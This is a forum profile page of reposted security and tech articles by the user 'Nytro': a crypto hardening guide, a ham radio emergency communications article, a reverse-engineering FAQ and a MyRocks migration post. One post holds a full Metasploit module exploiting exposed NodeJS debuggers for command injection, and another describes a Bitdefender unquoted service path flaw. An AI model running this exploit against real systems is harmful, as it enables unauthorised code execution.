Everything posted by Nytro
-
Cracking the Lens: Targeting HTTP's Hidden Attack Surface
Nytro replied to Nytro's topic in Securitate web
Yes, I have it printed out, I'll read it too in the next few days, it looks interesting. -
Title: https://9gag.com/gag/aMAzNp6
-
Can’t you download from the Softpedia source?
-
Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Alexander Würstlein, Aaron Zauner, Pepi Zawodsky (University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at)

Abstract

"Unfortunately, the computer security and cryptology communities have drifted apart over the last 25 years. Security people don't always understand the available crypto tools, and crypto people don't always understand the real-world problems." — Ross Anderson in [And08]

This guide arose out of the need for system administrators to have an updated, solid, well researched and thought-through guide for configuring SSL, PGP, SSH and other cryptographic tools in the post-Snowden age. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings. This guide is specifically written for these system administrators.

As Schneier noted in [Sch13a], it seems that intelligence agencies and adversaries on the Internet are not so much breaking the mathematics of encryption per se, but rather use software and hardware weaknesses, subvert standardization processes, plant backdoors, rig random number generators and, most of all, exploit careless settings in server configurations and encryption systems to listen in on private communications. Worst of all, most communication on the internet is not encrypted at all by default (for SMTP, opportunistic TLS would be a solution).

This guide can only address one aspect of securing our information systems: getting the crypto settings right to the best of the authors' current knowledge. Other attacks, such as those mentioned above, require different protection schemes which are not covered in this guide.

This guide is not an introduction to cryptography. For background information on cryptography and cryptanalysis we would like to refer the reader to the references in appendix B and C at the end of this document. The focus of this guide is merely to give current best practices for configuring complex cipher suites and related parameters in a copy & paste-able manner.

The guide tries to stay as concise as is possible for such a complex topic as cryptography. Naturally, it cannot be complete. There are many excellent guides [IS12, fSidIB13, ENI13] and best practice documents available when it comes to cryptography. However, none of them focuses specifically on what an average system administrator needs for hardening his or her systems' crypto settings. This guide tries to fill this gap.

Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf
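As a small companion to the guide: before and after applying hardened settings, it is worth checking what a server actually negotiates. A minimal sketch using Python's standard ssl module (the host name example.org is just a placeholder):

    import socket
    import ssl

    HOST = "example.org"  # placeholder target, replace with your own server

    # Connect with the platform's default trust settings and print what was negotiated.
    context = ssl.create_default_context()
    with socket.create_connection((HOST, 443)) as sock:
        with context.wrap_socket(sock, server_hostname=HOST) as tls:
            print("protocol:", tls.version())   # e.g. 'TLSv1.3'
            print("cipher:  ", tls.cipher())    # (name, protocol, secret bits)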
-
-
-
I wonder if we'll actually get to this? http://www.imdb.com/title/tt0181689/ On the other hand, this future is more plausible: http://www.imdb.com/title/tt0387808/
-
Great, all that's missing now is "3D Penis Recognition".
-
Ham Radio for Emergency Communications
SEPTEMBER 26, 2017 | MARK WAGGONER

Why have an article on Ham Radio on an InfoSec blog? As IT/IS professionals we tend to be some of the most "connected" people in society. We usually have several communication devices within arm's reach at any time, and rely on them to constantly update and alert us. Though many of us even work directly with infrastructure, we tend to take it for granted. I'm sure many of us cringe when we have a brief outage - it may wreck your 99.99% uptime. But what do you do when all that underlying infrastructure is gone, or at least not operational? How do you communicate when you have no internet or cell service? The recent hurricanes have brought this possibility home for a large number of people. Amateur Radio, commonly referred to as Ham Radio, has some answers for this type of dilemma. I'm sure some of you are thinking of an old guy in a shack with some huge, vacuum tube radio and a giant tower with antennas on it. Well, there are some of those around, but there is far more to Amateur Radio, particularly when it comes to Emergency Communications (EMCOM).

Let's start with a quick overview of the Amateur Radio Service. Ham Radio is a huge hobby with considerable width and breadth, so I'm going to use lots of generalization and gross simplification. But it starts with passing an exam and being licensed by the FCC. Exams generally must be taken in person and on paper. The American Radio Relay League has a list of exam providers and locations. The exams are based on a published question pool and the fee for the exam is between free and $15. There are three levels of licensing - Technician, General, and Extra - that grant the ability to use different allocations of the radio spectrum. The exams are not difficult: they are multiple choice and there are lots of study resources available, including mobile apps. There is no requirement to send Morse Code anymore! Once you pass your test, you do have to wait a few days to get your license and callsign; these are published on the FCC's website (my entry is here).

The Technician license gives you access to Ham Radio bands in the VHF/UHF range (30 MHz - 10 GHz). Radio waves in this range are generally line of sight (LoS): you must have an unobstructed path between your transmitter and the receiver at the destination. This is what you have probably experienced with GMRS/FRS radios (which are UHF). In order to extend the range and usefulness of LoS communications, repeaters placed in elevated locations are used. This can be extended even further with the use of linked repeaters. Repeaters do exactly what their name sounds like: they receive your signal and then re-broadcast it. As licensed operators, we also have the ability to use far more power (up to 1,500 watts) than the GMRS/FRS radios (about 1 watt). Systems based on these frequency ranges are used for local communications, generally within a metro area.

The General license type gives you access to the HF bands (1 MHz - 29 MHz). In this frequency range the radio waves travel by skywave instead of LoS. This allows you to potentially talk around the world by bouncing radio waves off of the ionosphere. The distance and direction of your communications are heavily dependent on the condition of the ionosphere. Things that affect the ionosphere: day vs. night, sunspots, solar flares, solar storms. Check out some space weather reports.
The Extra license adds some small allocations within the same bands the General has access to.

Local

For many people, the ability to get in touch with loved ones in their local area after a disaster is their primary concern. Close behind that is getting information on what is going on and what the response to the disaster is. These needs can be addressed with a Technician's license and equipment that can only operate in the VHF/UHF bands. Most metro areas have linked repeater systems that are hardened for EMCOM use. This includes a backup power source like a generator with days/weeks worth of fuel or a solar/battery system. During an emergency, traffic on these repeaters may be restricted at times so that your local ARES/RACES organization can use them for official traffic in response to the disaster. Listening in can give you valuable information about what is going on with relief efforts. In order to be able to take advantage of these systems you are going to need a few things:

- Radio
- Power supply
- Antenna
- Frequencies

Radios for these bands come in two form factors: the handheld HT (Handy Talkie in Ham Radio jargon), and the mobile form factor, about the size of a car stereo. These are usually single mode, FM radios that are either single or multi-band. Most new hams these days seem to start off with something like the Baofeng UV-5R, for around $20. But you get what you pay for. Something like the Yaesu FT-60 would probably be a better HT to start out with, at around $150. Handhelds range all the way up to around $600 for the Kenwood TH-D74, which is serious overkill for most people starting out. One of the advantages of handhelds is that they are self-contained (radio, battery, antenna). The disadvantage is that they are low powered (4-8 watts typically).

My Ham Radio setup, pretty basic but it works: Yaesu FT-817, TyT 9000, BaoFeng UV-82HP, TyT MD-380.

Mobile radios are often used as desktop radios as well as mobile. They are generally also single mode and either single or multi-band. These range from cheap Chinese radios (about $100) to high-end Japanese ones ($600+). With these radios you will also need an antenna and a 12V power supply. The antenna could span from an outdoor one on a mast, to a mobile antenna mounted in your home, to a roll-up style portable antenna. Power supply can be handled by either a purpose-built unit, or a suitable battery and charger. The advantage of a mobile setup at home is greater power (40-80 watts); the disadvantage for EMCOM is that they use more power.

While it is certainly possible to use a scanner or SDR (Software Defined Radio) to hunt for frequencies in use in your local area, it is far easier to start with a list you can program into your radio. Sites like www.radioreference.com help with finding local frequencies; joining a local club can also help (I belong to www.papasys.com here in Los Angeles). Please, do not make the mistake of thinking you can buy all this stuff and tuck it away until you need it. It takes practice and experience to effectively communicate with radios and troubleshoot issues.

Long Distance

Long distance communication via Ham radio is the realm of the HF (High Frequency) bands. Amateurs often use the approximate length of one wave as shorthand to refer to each band. The radios referenced above typically operate on the 2m and 70cm bands. HF radios are capable of operating on bands between 160m and 10m. The reason I bring this up is that the size of the antenna needed is directly related to the wavelength. Most antennas are either ½ or ¼ wavelength in order to be resonant. So, while a ½ wave antenna for a 2m radio is only about 3 feet long, one for the 40m band is 70 feet long (a quick calculation is sketched below). This can be a serious limiting factor for your use of these bands. There are compromise antennas that are much smaller, but they trade efficiency for size.
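For a rough sense of those numbers, hams commonly size a half-wave wire dipole with the rule of thumb length(feet) ≈ 468 / frequency(MHz). A tiny Python sketch (the in-band frequencies chosen here are only illustrative):

    def half_wave_dipole_feet(freq_mhz):
        # Common amateur-radio rule of thumb for a resonant half-wave dipole.
        return 468.0 / freq_mhz

    print(round(half_wave_dipole_feet(146.0), 1))  # 2 m band: about 3 ft
    print(round(half_wave_dipole_feet(7.1), 1))    # 40 m band: about 66 ft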
The list of requirements for HF EMCOM use is the same as for VHF/UHF:

- Radio
- Power supply
- Antenna
- Frequencies

Radios that cover the HF bands are generally much more expensive than those for the higher bands. For effective use in an emergency situation, you would probably want a radio that can put out up to 100 watts. Lower power (and price) radios exist, but are not as effective. About the lowest buy-in for a new HF rig is about $470 for the Alinco DX-SR8T. At the high end, the cost is $3,000-$6,000 for something like the Elecraft K3S. The closest thing to "One Radio to Rule Them All" is the Yaesu FT857D, at around $850. This covers almost all of the bands available and is a solid overall radio.

Power supplies are pretty much the same as for VHF radios, you just need to take power use into consideration. A 100 watt radio is going to burn through more amp hours of battery quicker than a 40 watt radio. Solar generators are ideal for getting through multiple days without mains power. Antennas can range from simple wire dipoles, to massive beam antennas, to compact magnetic loop antennas. Frequencies will vary between day (usually the 20m band) and night (usually 40m) and from event to event. HF requires practice and experience even more than VHF/UHF. There are so many factors that influence communication on these bands that there is almost no way you could be effective without a considerable amount of hands-on experience.

Conclusion

This is a very brief overview that barely scratches the surface of EMCOM and the Amateur Radio / Ham Radio hobby. I hope that this at least gives a good starting point for people who are interested in communications. Below is a list of further resources by people with far more experience and knowledge than myself if you want to dive deeper into this subject.

Links

- www.hamradio360.com - website and podcasts that cover the full breadth of the hobby in a very accessible way.
- www.survivaltechnology.net - blog and YouTube channel covering HF emergency and survival communications.
- www.aredn.org - Amateur radio mesh networking

Source: https://www.alienvault.com/blogs/security-essentials/ham-radio-for-emergency-communications
-
-
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"

  def initialize(info={})
    super(update_info(info,
      'Name'           => "NodeJS Debugger Command Injection",
      'Description'    => %q{
        This module uses the "evaluate" request type of the NodeJS V8 debugger
        protocol (version 1) to evaluate arbitrary JS and call out to other
        system commands. The port (default 5858) is not exposed non-locally in
        default configurations, but may be exposed either intentionally or via
        misconfiguration.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
      'References'     => [
        [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
        [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
      ],
      'Targets'        => [
        ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
      ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 15 2016",
      'DefaultTarget'  => 0)
    )
    register_options([ Opt::RPORT(5858) ])
  end

  def make_eval_message
    msg_body = {
      seq: 1,
      type: 'request',
      command: 'evaluate',
      arguments: {
        expression: payload.encoded,
        global: true,
        maxStringLength: -1
      }
    }.to_json

    msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
    msg_header + msg_body
  end

  def check
    connect
    res = sock.get_once
    disconnect

    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
      vprint_status("Got debugger handshake:\n#{res}")
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    connect

    # must consume incoming handshake before sending payload
    buf = sock.get_once

    msg = make_eval_message
    print_status("Sending #{msg.length} byte payload...")
    vprint_status("#{msg}")
    sock.put(msg)

    buf = sock.get_once
    if buf.include? '"command":"evaluate","success":true'
      print_status("Got success response")
    elsif buf.include? '"command":"evaluate","success":false'
      print_error("Got failure response: #{buf}")
    else
      print_error("Got unexpected response: #{buf}")
    end
  end
end

Source: https://www.exploit-db.com/exploits/42793/
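For readers who want to poke at the protocol without Metasploit: the wire format the module builds is just a Content-Length header followed by a JSON "evaluate" request. A minimal Python sketch against an assumed local debug port, using a harmless expression instead of a payload:

    import json
    import socket

    HOST, PORT = "127.0.0.1", 5858   # assumed local node --debug target
    EXPRESSION = "process.version"   # harmless expression instead of a payload

    body = json.dumps({
        "seq": 1,
        "type": "request",
        "command": "evaluate",
        "arguments": {"expression": EXPRESSION, "global": True, "maxStringLength": -1},
    })
    message = "Content-Length: %d\r\n\r\n%s" % (len(body), body)

    with socket.create_connection((HOST, PORT)) as s:
        print(s.recv(4096).decode(errors="replace"))  # debugger handshake banner
        s.sendall(message.encode())
        print(s.recv(4096).decode(errors="replace"))  # evaluate response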
-
Description: Bitdefender Total Security suffers from an unquoted service path vulnerability, which could allow an attacker to execute arbitrary code on a target system. If the executable path is enclosed in quotes ("") the system knows exactly where to find it. However, if the path to the application binary is unquoted and contains spaces, Windows will try to find and execute a binary in every folder along that path until it reaches the real executable. PDF: https://secur1tyadvisory.files.wordpress.com/2017/09/bitdefender-total-security-2017-unquoted-service-path-vulnerability_sachin_waghtiger_tigerboy.pdf
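To make the issue concrete: for an unquoted path such as C:\Program Files\Vendor App\svc.exe, Windows will first try C:\Program.exe, then C:\Program Files\Vendor.exe, and so on. A rough Python sketch for spotting such services on your own machine, reading ImagePath values from the registry (the space-before-.exe heuristic is a simplification):

    import winreg

    SERVICES = r"SYSTEM\CurrentControlSet\Services"

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICES) as root:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(root, i)
                i += 1
            except OSError:
                break  # no more service subkeys
            try:
                with winreg.OpenKey(root, name) as svc:
                    path, _ = winreg.QueryValueEx(svc, "ImagePath")
            except OSError:
                continue  # service without an ImagePath value
            p = str(path).strip()
            # Flag paths that are not quoted but contain a space before the executable name.
            if p and not p.startswith('"') and " " in p.split(".exe")[0]:
                print("%s: %s" % (name, path))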
-
-
-
2017-09-24: FAQ: How to learn reverse-engineering?

Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment.

Q: How to learn reverse-engineering?
Q: Could you recommend any resources for learning reverse-engineering?

A: For the sake of this blog post I'll assume that the question is about reverse code engineering (RE for short), as I don't know anything about reverse hardware/chip engineering. My answer is also going to be pretty high-level, but I'll assume that the main subject of interest is x86 as that is the architecture one usually starts with. Please also note that this is not a reverse-engineering tutorial - it's a set of tips that are supposed to hint you what to learn first.

I'll start by noting two crucial things:

1. RE is best learnt by practice. One does not learn RE by reading about it or watching tutorials - these are valuable additions and allow you to pick up tricks, tools and the general workflow, but should not be the core of any learning process.
2. RE takes time. A lot of time. Please prepare yourself for reverse-engineering sessions which will take multiple (or even tens of) hours to finish. This is normal - don't be afraid to dedicate the required time.

While reverse-engineering a given target one usually uses a combination of three means:

• Analysis of the dead-listing - i.e. analyzing the result of the disassembly of a binary file, commonly known as static analysis.
• Debugging the live target - i.e. using a debugger on a running process, commonly known as dynamic analysis.
• Behavioral analysis - i.e. using high-level tools to get selected signals on what the process is doing; examples might be strace or Process Monitor.

Given the above, a high-level advice would be to learn a mix of the means listed above while working through a series of reverse-engineering challenges (e.g. crackmes or CTF RE tasks1).

1 While reversing a crackme/CTF task is slightly different than a normal application, the former will teach you a lot of anti-RE tricks you might find and how to deal with them. Normal applications however are usually larger and it's easier to get lost in the huge code base at the beginning.

Below, in sections detailing the techniques mentioned above, I've listed resources and tools that one might want to get familiar with when just starting. Please note that these are just examples and other (similar) tools might be better suited for a given person - I encourage you to experiment with different programs and see what you like best.

Analysis of the dead-listing

Time to call out the elephant in the room - yes, you will have to learn x86 assembly. There isn't a specific tutorial or course I would recommend (please check out the comment section though), however I would suggest starting with 64-bit or 32-bit x86 assembly.
Do not start with 16-bit DOS/real-mode stuff - things are different in 64-/32-bit modes (plus 64-/32-bit modes are easier in user-land2) and 16-bit is not used almost anywhere in modern applications. Of course, if you are curious about the old times and care about things like DOS or BIOS, then by all means, learn 16-bit assembly at some point - just not as the first variation.

2 16-bit assembly has a really weird addressing mode which has been replaced in 64-/32-bit mode with a different, more intuitive model; another change is related to increasing the number of possible address encodings in opcodes, which makes things easier when writing assembly.

When learning assembly try two things:

• See how your C/C++ compiler translates high-level code into assembly. While almost all compilers have an option to generate output in assembly (instead of machine code wrapped in object files), I would like to recommend the Compiler Explorer (aka godbolt.org) project for this purpose - it's an easy to use online service that automates this process.
• Try writing some assembly code from scratch. It might be a pain to find a tutorial / book for your architecture + operating system + assembler (i.e. assembly compiler) of choice3 and later to actually compile and link the created code, but it's a skill one needs to learn. Once you have successfully completed the exercise with one set of tools, try the same with a different assembler/linker (assembly dialects vary a little, or a little more if we point at the Intel vs AT&T syntax issue - try to get familiar with such small variations to not get surprised by them). I would recommend trying out the following combinations:
  • Linux 32-/64-bits and GNU Assembler (Intel, AT&T, or both),
  • Windows 32-/64-bits and fasm,
  • Linux 32-/64-bits and nasm + GCC.

3 A common mistake is to try to learn assembly from e.g. a 16-bit + DOS + tasm tutorial while using e.g. 32-bit + Linux + nasm - this just won't work. Be sure that you use a tutorial matched to your architecture + operating system + assembler (these three things), otherwise you'll run into unexpected problems.

One thing to remember while learning assembly is that it's a really, really simple language on the syntax level, but the complexity comes with having to remember various implicit details related to the ABI (Application Binary Interface), the OS and the architecture. Assembly is actually pretty easy once you get the general idea, so don't be scared by it.

A couple of supporting links:

• The Complete Pentium Instruction Set Table (32 Bit Addressing Mode Only) by Sang Cho - a cheatsheet of 32-bit x86 instructions and their machine-code encoding; really handy at times.
• Intel® 64 and IA-32 Architectures Software Developer Manuals - Volume 2 (detailed description of the instructions) is something you want to keep close and learn how to use really well. I would recommend going through Volume 1 when learning, and Volume 3 at intermediate/advanced level.
• AMD's Developer Guides, Manuals & ISA Documents - similar manuals, but from AMD; some people prefer these.
• [Please look in the comment section for any additional links recommended by others.]

One way of learning assembly I didn't mention so far, but which is really obvious in the context of this post, is learning by reading it, i.e. by reverse engineering code4.

4 Do remember however that reading the code will not teach you how to write it. These are related but still separate skills.
Please also note that in order to be able to modify the behavior of an application you do have to be able to write small assembly snippets (i.e. patches). To do that one usually needs a disassembler, ideally an interactive one (that allows you to comment, modify the annotations, display the code in graph form, etc.):

• Most professionals use IDA Pro, a rather expensive but powerful interactive disassembler, that has a free version (for non-commercial use) which is pretty limited, but works just fine for 32-bit Windows targets.
• The new player on the market is Binary Ninja, which is much cheaper, but still might be on the expensive side for hobbyists.
• Another one is called Hopper, though it's available only for Linux and macOS.
• There is also an open source solution in the form of radare2 - it's pretty powerful and free, but has the usual UX problems of open-source software (i.e. the learning curve for the tool itself is much steeper).
• If all else fails, one can always default to a non-interactive disassembler such as objdump from GNU binutils, which supports architectures that even IDA doesn't (note that in such a case you can always save the output in a text file and then add comments there - this is also a good fallback when IDA/BN/etc. don't support a given architecture of interest).

Having the tool of choice installed and already knowing some assembly, it's good to just jump straight into reverse-engineering of small and simple targets. A good exercise is to write a program in C/C++ and compile it, and then, using only the disassembler output, try to reverse it into a high-level representation, and finally into proper C/C++ code (see the illustration below). Once you get the hang of this process you should also be able to skip it altogether and still be able to understand what a given function does just after analyzing it and putting some comments here and there (keep in mind that this does take some practice).

One important thing I have not yet mentioned is that being able to reverse a given function only gives you a low-level per-function view of the application. Usually, to understand an application you need to first find which functions are worth analyzing at all. For example, you probably don't want to get sidetracked by spending a few hours reversing a set of related functions just to find out they are actually the implementation of malloc or std::cout (well, you'll reverse your share of these anyway while learning, that's just how it is). There are a few tips I can give you here:

• Find the main function and start the analysis from there.
• Look at the strings and imported functions; find where they are used and go up the call-stack from there.
• More advanced reversers also like to do trace diffing in case of larger apps, though this FAQ isn't a place to discuss this technique.
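As a small taste of working with a dead-listing programmatically (and a handy fallback when a GUI disassembler is overkill), a few lines of Python with the Capstone disassembly library can turn raw bytes into an instruction listing. The byte string and load address below are just arbitrary examples:

    from capstone import Cs, CS_ARCH_X86, CS_MODE_64

    # Arbitrary example bytes: push rbp; mov rax, qword ptr [rip + 0x13b8]
    CODE = b"\x55\x48\x8b\x05\xb8\x13\x00\x00"

    md = Cs(CS_ARCH_X86, CS_MODE_64)          # x86, 64-bit mode
    for insn in md.disasm(CODE, 0x1000):      # 0x1000 is an assumed load address
        print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))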
Debugging the live target

Needless to say, a debugger is a pretty important tool - it allows you to stop execution of a process at any given point and analyze the memory state, the registers and the general process environment - these elements provide valuable hints towards understanding the code you're looking at. For example, it's much easier to understand what a function does if you can pause its execution at any given moment and take a look at what exactly the state consists of; sometimes you can just take an educated guess (see also the illustration below).

Of course the assembly language mentioned in the previous section comes into play here as well - one of the main views of a debugger is the instruction list near the instruction pointer. There is a pretty good choice of assembly-level debuggers out there, though most of them are for Windows for some reason5:

• x64dbg - an open-source Windows debugger similar in UX to the classic OllyDbg. This would be my recommendation for the first steps in RE; you can find it here.
• Microsoft WinDbg - a free and very powerful user-land and kernel-land debugger for Windows made by Microsoft. The learning curve is pretty steep as it's basically a command-line tool with only some features available as separate UI widgets. It's available as part of the Windows SDK. On a sidenote, honorary_bot did a series of livestreams about WinDbg - it was in the context of kernel debugging, but you can still pick up some basics there (1, 2, 3, 4; at first start with the 2nd part).
• GDB - the GNU Debugger is a powerful open-source command-line tool, which does require you to memorize a set of commands in order to be able to use it. That said, there are a couple of scripts that make life easier, e.g. pwndbg. You can find GDB for both Linux and Windows (e.g. as part of the MinGW-w64 packet), and other platforms; this includes non-x86 architectures.
• [Some interactive disassemblers also have debugging capabilities.]
• [Do check out the comment section for other recommendations.]

5 The reason is pretty obvious - Windows is the most popular closed-source platform, therefore the Windows branch of reverse-engineering is the most developed one.

The basic step after installing a debugger is getting to know it, therefore I would recommend:

• walking through the UI with a tutorial,
• and also seeing how someone familiar with the debugger is using it. YouTube and similar sites seem to be a good starting point to look for these.

After spending some time getting familiar with the debugger and attempting to solve a couple of crackmes, I would recommend learning how a debugger works internally, initially focusing on the different forms of breakpoints and how they are technically implemented (e.g. software breakpoints, hardware breakpoints, memory breakpoints, and so on). This gives you the basis to understand how certain anti-RE tricks work and how to bypass them. Further learning milestones include getting familiar with various debugger plugins and also learning how to use a scripting language to automate tasks (writing ad-hoc scripts is a useful skill).
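To illustrate the scripting point: GDB embeds a Python interpreter, so ad-hoc automation can be as small as a breakpoint subclass. A rough sketch (the function name malloc is just an example target) that counts calls without stopping the program:

    # Loaded inside GDB, e.g. with:  (gdb) source count_malloc.py
    import gdb

    class CountingBreakpoint(gdb.Breakpoint):
        """Count how many times a location is hit without pausing execution."""
        def __init__(self, location):
            super().__init__(location)
            self.hits = 0

        def stop(self):
            self.hits += 1
            return False  # returning False tells GDB to keep running

    bp = CountingBreakpoint("malloc")  # example target function
    gdb.execute("run")                 # run the debuggee to completion
    print("malloc was called %d times" % bp.hits)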
Behavioral analysis

The last group of methods is related to monitoring how a given target interacts with the environment - mainly the operating system and various resources like files, sockets, pipes, the registry and so on. This gives you high-level information on what to expect from the application, and at times also some lower-level hints (e.g. the instruction pointer when a given event happened, or a call stack). At the start I would recommend taking a look at the following tools:

• Process Monitor is a free Windows application that allows you to monitor system-wide (with convenient filtering options) access to files, registry, network, as well as process-related events.
• Process Hacker and Process Explorer are two free replacements for Windows' Task Manager - both offer more detailed information about a running process though.
• Wireshark is a cross-platform network sniffer - pretty handy when reversing a network-oriented target. You might also want to check out Message Analyzer for Windows.
• strace is a Linux tool for monitoring syscall access of a given process (or tree of processes). It's extremely useful at times.
• ltrace is similar to strace, however it monitors dynamic library calls instead of syscalls.
• [On Windows you might also want to search for a "WinAPI monitor", i.e. a tool similar to ltrace (I'm not sure which tool to recommend here though).]
• [Some sandboxing tools for Windows also might give you behavioural logs for an application (but again, I'm not sure which tool to recommend).]
• [Do check out the comment section for other recommendations.]

The list above barely scratches the surface of existing monitoring tools. A good habit to have is to search whether a monitoring tool exists for the given resource you want to monitor.

Other useful resources and closing words

As I mentioned at the beginning, this post is only supposed to get you started, therefore everything mentioned above is just the tip of the proverbial iceberg (though now you should at least know where the iceberg is located). Needless to say, there are countless things I have not mentioned here, e.g. the whole executable packing/unpacking problem and other anti-RE & anti-anti-RE struggles, etc. But you'll meet them soon enough. The rest of this section contains a list of books, links and other resources that might be helpful (but please, please keep in mind that in the context of RE the most important thing is almost always actually applying the knowledge and almost never just reading about it).

Let's start with books:

• Reverse Engineering for Beginners (2017) by Dennis Yurichev (CC BY-SA 4.0, so yes, it's free and open)
• Practical Malware Analysis (2012) by Michael Sikorski and Andrew Honig
• Practical Reverse Engineering (2014) by Bruce Dang, Alexandre Gazet, Elias Bachaalany, Sebastien Josse
• [Do check out the comment section for other recommendations.]

There are of course more books on the topic, some of which I learnt from, but time has passed and things have changed, so while the books still contain valuable information, some of it might be outdated or targeting deprecated tools and environments/architectures. Nonetheless, I'll list a couple here just in case someone interested in historic RE stumbles upon this post:

• Hacker Disassembling Uncovered (2003) by Kris Kaspersky (note: the first edition of this book was made available for free by the author, however the links no longer work)
• Reversing: Secrets of Reverse Engineering (2005) by Eldad Eilam
• [Do check out the comment section for other recommendations.]

Some other resources that you might find useful:

• Tuts 4 You - a large website dedicated to reverse-engineering. I would especially like to point out the Downloads section which, among other things, contains tutorials, papers and CrackMe challenges (you can find the famous crackmes.de archive there too).
• /r/ReverseEngineering - reddit has a well maintained section with news from the RE industry.
• Reverse Engineering at StackExchange - in case you want to skim through commonly asked questions or ask your own.
• PE Format - Windows executable file format - it's pretty useful to be familiar with it when working on this OS.
• Executable and Linkable Format (ELF) - Linux executable file format (see note above).
• Ange Albertini's executable format posters (among many other things) - analyzing Ange's PE and ELF posters greatly simplifies the learning process for these formats.
• [Do check out the comment section for other recommendations.]
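Speaking of executable formats, a nice first exercise for getting comfortable with ELF (or PE) is to parse a few header fields by hand. A minimal Python sketch for the start of a 64-bit little-endian ELF header (field offsets follow the standard ELF layout; error handling omitted):

    import struct

    with open("/bin/ls", "rb") as f:   # any ELF binary will do
        header = f.read(64)

    assert header[:4] == b"\x7fELF"            # magic
    ei_class, ei_data = header[4], header[5]   # 1/2 = 32/64-bit, 1/2 = little/big endian
    e_type, e_machine = struct.unpack_from("<HH", header, 16)
    e_entry, = struct.unpack_from("<Q", header, 24)  # valid for 64-bit little-endian files

    print("class:", {1: "ELF32", 2: "ELF64"}.get(ei_class))
    print("machine: 0x%x (0x3e is x86-64)" % e_machine)
    print("entry point: 0x%x" % e_entry)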
I'll add a few more links to my own creations, in case someone finds them useful:

• Practical RE tips (1.5h lecture)
• You might also find some reverse-engineering action as part of my weekly livestreams. An archive can be found on my YouTube channel.

Good luck! And most of all, have fun!

Source: http://gynvael.coldwind.pl/?id=664
-
-
-
-
Migrating a database from InnoDB to MyRocks
Yoshinori Matsunobu

Last year, we introduced MyRocks, our new MySQL database engine, with the goal of improving space and write efficiency beyond what was possible with compressed InnoDB. Our objective was to migrate one of our main databases (UDB) from compressed InnoDB to MyRocks and reduce the amount of storage and number of servers used by half. We carefully planned and implemented the migration from InnoDB to MyRocks for our UDB tier, which manages data about Facebook's social graph. We completed the migration last month, and successfully cut our storage usage in half. This post describes how we prepared for and executed the migration, and what lessons we learned along the way.

UDB was space-bound

Several years ago, we changed the UDB hardware from Flashcache to pure Flash, which addressed some performance issues. MySQL with InnoDB was fast and reliable, but we wanted to be more efficient by using less hardware to support the same workload and data. With pure Flash, UDB was space-bound. Even though we used InnoDB compression and there was excess CPU and random I/O capacity, it was unlikely that we could enhance InnoDB to use less space.

Fig 1: InnoDB was space-bound and CPU/IO were idle. This is common with Flash.

This was one of the motivations for creating MyRocks - a RocksDB storage engine for MySQL. We implemented several features to match InnoDB where the database size was much bigger than RAM, including:

- Clustered index
- Transaction (Atomicity, Row locks, MVCC, Repeatable Read/Read Committed, 2PC across binlog and RocksDB)
- Crash-safe slave/master
- SingleDelete (efficient deletions for secondary indexes)
- Fast data loading, fast index creation, and fast drop table

Our early experiments showed that space usage with MyRocks was cut in half compared with compressed InnoDB, without significantly increasing CPU and I/O utilization. So we decided to fully migrate UDB from InnoDB to MyRocks.

Fig 2: Estimated workloads in MyRocks, with 2x density. There is still CPU/IO capacity.

Easier migration from InnoDB to MyRocks

Database migration can be challenging for user-facing database services. In general, production OLTP database migration has to be done without stopping services, without degrading latency/throughput, without returning wrong data, and without affecting operations. MyRocks has a unique advantage compared with other database technologies - it's also in MySQL, so the similarities make it much easier to migrate from InnoDB. For example:

- No application change was needed because MySQL client protocols and schema definitions were the same. (There were actually some minor differences, like Gap Lock, but they were relatively easy to address.)
- Our existing MySQL administration tools could support both InnoDB and MyRocks.
- MyRocks could replicate from InnoDB. We could add a MyRocks instance by running it as one of the read-only slaves.
- InnoDB could also replicate from MyRocks. We could deploy MyRocks on a master without destroying InnoDB. This allowed us to demote MyRocks and promote InnoDB again if an issue arose in production.
- Binary logs with Global Transaction Identifier (GTID) made it possible to verify data consistency between InnoDB and MyRocks instances, without stopping replication for a long time (less than 1 second).

Data consistency verification

MyRocks/RocksDB was a newer database, so we helped prevent introducing new bugs into our database with a comprehensive data consistency verification.
The verification has run continuously - both during migration and after running in production:

- Primary key and secondary key consistency check. This compared row counts and column checksums between the primary and secondary keys of the same MyRocks tables. For example, if there was a column (id, value1, value2) for table t1 and there was a secondary index for (value1), the tool scanned value1 by primary key and by secondary key, then compared row counts and checksums. If either the primary key or secondary key was corrupted, the checksums wouldn't match.
